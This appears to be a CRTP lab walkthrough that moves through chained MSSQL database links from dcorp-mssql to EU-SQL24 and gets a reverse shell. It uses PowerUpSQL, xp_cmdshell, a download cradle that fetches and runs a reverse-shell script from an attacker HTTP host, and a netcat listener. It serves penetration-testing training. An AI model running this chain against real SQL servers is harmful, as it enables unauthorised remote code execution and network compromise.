CRTP Lab 22
Task
Get a reverse shell on a SQL server in the eurocorp forest by abusing database links from dcorp-mssql.
First, enumerate SQL servers in the domain and check whether the student user has privileges to connect to any of them. Run InviShell and use PowerUpSQL for the enumeration.
PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1
# Look for SPNs that start with MSSQL*
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.
PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
VERBOSE: Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:
We have sysadmin privileges on EU-SQL24 through the link chain (the link itself authenticates as sa).
If xp_cmdshell is enabled on EU-SQL24, it is possible to execute OS commands there through the links. If it is disabled, it can only be switched on with sp_configure when the link allows RPC Out, so check that before assuming the chain is a dead end.
To avoid dealing with a large number of quotes and escapes, use the following command:
To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1.
Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1.
Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without the quotes) to the end of the file, so the script connects back as soon as it is loaded in memory on the target.
Host the file on the attacker's HTTP server and start a netcat listener on port 443 before firing the query.
On Listener:
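The whole chain in one place, as an added example rather than the lab's own command text. It assumes PowerUpSQL is at the path imported earlier, that the attacker host 172.16.100.X serves the renamed script over plain HTTP on port 80, and that nc64.exe is on the PATH of the attacker machine (the listener line is a reminder only).

```powershell
# Added example (not from the lab page). Assumptions: PowerUpSQL path as imported earlier
# in the lab, HTTP server on 172.16.100.X port 80, nc64.exe available on the attacker box.
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1

$instance = 'dcorp-mssql.dollarcorp.moneycorp.local'
$target   = 'eu-sql24'

# 1. Prove OS command execution on the last hop before doing anything noisier.
#    -QueryTarget runs the query only on that server in the crawled chain; the result
#    comes back in the CustomQuery property of the returned object.
Get-SQLServerLinkCrawl -Instance $instance -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget $target |
    Select-Object Instance, Path, CustomQuery | Format-List

# 2. Download cradle for the renamed script. Using -c with iex/iwr keeps the payload free
#    of single quotes, so it drops straight into xp_cmdshell's '...' without escaping.
$cradle = 'powershell -c iex (iwr -UseBasicParsing http://172.16.100.X/Invoke-PowerShellTcpEx1.ps1)'

# Start the listener first, in a separate window on the attacker machine:
#   nc64.exe -lvp 443
Get-SQLServerLinkCrawl -Instance $instance -Query "exec master..xp_cmdshell '$cradle'" -QueryTarget $target
```

The whoami check is worth keeping: if it returns nothing, xp_cmdshell is disabled or RPC Out is not allowed on the link, and the cradle would have failed silently. The shell arrives in the netcat window, not in the PowerUpSQL output, which will simply return once the query completes.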